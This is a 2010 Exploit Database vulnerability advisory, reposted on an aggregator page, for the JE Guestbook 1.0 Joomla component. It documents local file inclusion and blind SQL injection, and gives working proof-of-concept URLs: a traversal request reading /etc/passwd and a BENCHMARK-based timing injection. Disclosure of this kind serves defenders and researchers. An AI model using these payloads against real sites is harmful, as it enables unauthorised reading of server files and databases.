Joomla! Component JE Guestbook 1.0 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Salvatore Fresta
  日期： 2010-09-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15157/

• JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities
  
   NameJE Guestbook
   Vendorhttp://www.joomlaextensions.co.in
   Versions Affected 1.0
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-09-30
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  JE GuestComponentisan open source Joomla guestbook
  componentwithspam protectionand many customization
  options.
  
  
  II. DESCRIPTION
  _______________
  
  Some parameters are not properly sanitised.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Local File Inclusion
   B) Multiple Blind SQL Injection
   
  
  A) Local File Inclusion
  _______________________
  
  Input passed to the "view" parameter injeguestbook.php
  (when option is set to com_jeguestbook)is not properly
  verified before being used to include files. This can be
  exploited to include arbitraryfilesfromlocal
  resourcesvia directory traversal attacks and
  URL-encoded NULL bytes.
  
  
  B) Multiple Blind SQL Injection
  _______________________________
  
  Many parameters are not properly sanitised before being
  used in SQL queries.This can be exploited to manipulate
  SQL queries by injecting arbitrary SQL code.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Local File Inclusion
  
  http://site/path/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
  
  
  B) Multiple Blind SQL Injection
  
  http://site/path/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
  
  
  V. FIX
  ______
  
  No fix.